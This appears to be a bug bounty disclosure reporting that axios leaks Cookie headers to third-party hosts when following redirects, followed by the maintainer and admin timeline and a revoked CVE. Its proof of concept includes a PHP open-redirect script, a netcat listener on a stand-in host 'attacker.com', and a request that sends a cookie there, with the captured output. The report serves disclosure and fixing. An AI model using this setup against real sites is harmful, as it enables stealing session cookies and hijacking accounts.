Exposure of Sensitive Information to an Unauthorized Actor in axios/axios

Valid

Reported on

Jan 5th 2022


BUG

Cookie header leaked to third party site and it allow to hijack victim account

SUMMURY

When fetching a remote url with Cookie if it get Location response header then it will follow that url and try to fetch that url with provided cookie . So cookie is leaked here to thirdparty.
Ex: you try to fetch example.com with cookie and if it get redirect url to attacker.com then it fetch that redirect url with provided cookie .
So, Cookie of example.com is leaked to attacker.com .
Cookie is standard way to authentication into webapp and you should not leak to other site .
All browser follow same-origin-policy so that when redirect happen browser does not send cookie of example.com to attacker.com .

FLOW

if you fetch http://mysite.com/redirect.php?url=http://attacker.com:8182/ then it will redirect to http://attacker.com:8182/ .

First setup a webserver and a netcat listner

http://mysite.com/redirect.php?url=http://attacker.com:8182/

//redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");

/* Make sure that code below does not get executed when we redirect. */
exit;
?>

netcat listner in http://attacker.com

nc -lnvp 8182

STEP TO RERPODUCE

run bellow axios code

const axios = require('axios');

// Make a request for a user with a given ID
axios.get('http://mysite.com/redirect.php?url=http://attacker.com:8182/yy',{headers:{"Cookie":"dfdd=df"}})
  .then(function (response) {
    // handle success
    console.log(response);
  })
  .catch(function (error) {
    // handle error
    console.log(error);
  })
  .then(function () {
    // always executed
  });

response received in attacker netcat

Connection from 127.0.0.1 36724 received!
GET /yy HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: dfdd=df
User-Agent: axios/0.24.0
Host: localhost:8182
Connection: close

So, here i provided cookie for mysite.com but due to redirect it leaks to thirdparty site attacker.com

SUGGESTED FIX

If provided url domain and redirect url domain is same then you can only send cookie/authorization header to redirected url . But if the both domain not same then its a third party site which will be redirected, so you dont need to send Cookie/Authorization header.

We are processing your report and will contact the axios team within 24 hours. 5 months ago
We have contacted a member of the axios team and are waiting to hear back 5 months ago
We have sent a follow up to the axios team. We will try again in 7 days. 5 months ago
Jay
5 months ago

Maintainer


Thanks I can see how this would be a issue, I will get back to you soon with a fix

ranjit-git
5 months ago

Researcher


thanks for reply . Here is another similar report https://huntr.dev/bounties/fc524e4b-ebb6-427d-ab67-a64181020406/ to another repo . Maintainer has fixed this bug by verifying the current domain and redirected domain check .
If current url domain is same with redirected url domain then no problem . But if current domain and redirect domain is different then dont need to send cookie of current domain to redirect domain to prevent this cookie leak .

ranjit-git modified the report
5 months ago
ranjit-git
4 months ago

Researcher


Hi , i just saw the axios uses follow-redirect which was vulnerable to this attack . https://github.com/follow-redirects/follow-redirects/issues/183#issuecomment-1012265743
https://github.com/axios/axios/issues/4378

We have sent a second follow up to the axios team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the axios team. This report is now considered stale. 4 months ago
ranjit-git
2 months ago

Researcher


any update?

Jay validated this vulnerability 2 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the axios team. We will try again in 7 days. 2 months ago
We have sent a second fix follow up to the axios team. We will try again in 10 days. a month ago
We have sent a third and final fix follow up to the axios team. This report is now considered stale. a month ago
Pavlos Moros
a month ago

Admin


@maintainer could you please mark this vulnerability as fixed? :)

Jay confirmed that a fix has been merged on c9aca7 a month ago
The fix bounty has been dropped
Jamie Slome
24 days ago

Admin


The CVE has been revoked here due to the following discussion.

to join this conversation